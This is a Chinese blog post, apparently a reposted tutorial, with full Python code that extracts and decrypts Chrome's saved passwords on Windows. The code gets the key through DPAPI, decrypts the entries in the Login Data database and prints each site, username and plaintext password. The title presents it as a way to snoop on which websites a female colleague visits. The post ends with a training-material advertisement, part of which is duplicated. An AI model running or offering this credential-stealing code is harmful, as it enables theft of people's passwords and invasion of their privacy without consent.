同事女神小姐姐经常用网页浏览那种东西。用Python提取Chrome浏览器保存的密码！就自然找到是哪个网站了

首先，让我们安装所需的库：

pip install pycryptodome pypiwin32

打开一个新的 Python 文件，并导入必要的模块：

import os

import json

import base64

import sqlite3

import win32crypt

from Crypto.Cipher import AES

import shutil

from datetime import timezone, datetime, timedelta

在直接进入提取 chrome密码之前，我们需要定义一些有用的函数来帮助我们在主函数中。

def get_chrome_datetime(chromedate):

“”"从chrome格式的datetime返回一个datetime.datetime对象

因为’chromedate’的格式是1601年1月以来的微秒数"“”

return datetime(1601, 1, 1) + timedelta(microseconds=chromedate)

def get_encryption_key():

local_state_path = os.path.join(os.environ[“USERPROFILE”],“AppData”, “Local”, “Google”, “Chrome”,“User Data”, “Local State”)

with open(local_state_path, “r”, encoding=“utf-8”) as f:

local_state = f.read()

local_state = json.loads(local_state)

从Base64解码加密密钥

key = base64.b64decode(local_state[“os_crypt”][“encrypted_key”])

删除 DPAPI str

key = key[5:]

返回最初加密的解密密钥

使用从当前用户的登录凭据派生的会话密钥

官方文档doc: http://timgolden.me.uk/pywin32-docs/win32crypt.html

return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]

def decrypt_password(password, key):

try:

获取初始化向量

iv = password[3:15]

password = password[15:]

生成密码

cipher = AES.new(key, AES.MODE_GCM, iv)

解密密码

return cipher.decrypt(password)[:-16].decode()

except:

try:

return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])

except:

not supported

return “”

get_chrome_datetime()函数负责将 chrome 日期格式转换为人类可读的日期时间格式。 get_encryption_key()函数提取并解码用于加密密码的AES密钥，这"%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Local State"作为 JSON 文件存储在路径中

decrypt_password() 将加密密码和 AES 密钥作为参数，并返回密码的解密版本。

下面是main主要功能：

def main():

获取AES密钥

key = get_encryption_key()

本地sqlite Chrome数据库路径

db_path = os.path.join(os.environ[“USERPROFILE”], “AppData”, “Local”,“Google”, “Chrome”, “User Data”, “default”, “Login Data”)

将文件复制到其他位置

因为如果chrome当前正在运行，数据库将被锁定

filename = “ChromeData.db”

shutil.copyfile(db_path, filename)

连接数据库

db = sqlite3.connect(filename)

cursor = db.cursor()

登录表中有我们需要的数据

cursor.execute(“select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created”)

iterate over all rows

for row in cursor.fetchall():

origin_url = row[0]

action_url = row[1]

username = row[2]

password = decrypt_password(row[3], key)

date_created = row[4]

date_last_used = row[5]

if username or password:

print(f"Origin URL: {origin_url}")

print(f"Action URL: {action_url}")

print(f"Username: {username}")

print(f"Password: {password}")

else:

continue

if date_created != 86400000000 and date_created:

print(f"Creation date: {str(get_chrome_datetime(date_created))}")

if date_last_used != 86400000000 and date_last_used:

print(f"Last Used: {str(get_chrome_datetime(date_last_used))}")

print(“=”*50)

cursor.close()

db.close()

try:

尝试删除复制的db文件

os.remove(filename)

except:

pass

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数Python工程师，想要提升技能，往往是自己摸索成长或者是报班学习，但对于培训机构动则几千的学费，着实压力不小。自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年Python开发全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友，同时减轻大家的负担。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上Python开发知识点，真正体系化！

由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新

如果你觉得这些内容对你有帮助，可以添加V获取：vip1024c （备注Python）

（1）Python所有方向的学习路线（新版）

这是我花了几天的时间去把Python所有方向的技术点做的整理，形成各个领域的知识点汇总，它的用处就在于，你可以按照上面的知识点去找对应的学习资源，保证自己学得较为全面。

最近我才对这些路线做了一下新的更新，知识体系更全面了。

（2）Python学习视频

包含了Python入门、爬虫、数据分析和web开发的学习视频，总共100多个，虽然没有那么全面，但是对于入门来说是没问题的，学完这些之后，你可以按照我上面的学习路线去网上找其他的知识资源进行进阶。

（3）100多个练手项目

我们在看视频学习的时候，不能光动眼动脑不动手，比较科学的学习方法是在理解之后运用它们，这时候练手项目就很适合了，只是里面的项目比较多，水平也是参差不齐，大家可以挑自己能做的项目去练练。

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

的项目比较多，水平也是参差不齐，大家可以挑自己能做的项目去练练。

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！
[外链图片转存中…(img-KQXzQpWq-1712789022898)]